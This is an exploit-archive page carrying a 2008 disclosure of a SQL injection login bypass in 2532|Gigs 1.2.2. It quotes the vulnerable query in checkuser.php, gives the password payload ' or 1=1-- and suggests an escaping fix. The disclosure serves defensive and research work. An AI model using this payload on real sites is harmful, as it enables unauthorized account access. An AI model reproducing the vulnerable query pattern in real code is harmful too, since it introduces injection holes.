what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

2532|Gigs 1.2.2 Stable Login Bypass

2532|Gigs 1.2.2 Stable Login Bypass
Posted Dec 22, 2008
Authored by StAkeR

2532|Gigs version 1.2.2 Stable suffers from a remote login bypass vulnerability.

tags | exploit, remote, bypass
SHA-256 | b92ec05691fb7744af74baaf967dbd0f4466361097ed62af77aef12cd8311c26
Download | Favorite | View

2532|Gigs 1.2.2 Stable Login Bypass

Change Mirror Download
/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ... 
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 * 
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *  
 * $username = mysql_real_escape_string($_POST['username']); 
 * $password = mysql_real_escape_string($_POST['password']);
 * 
 * ------------------------------------------------------------------------------------------------
 */


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close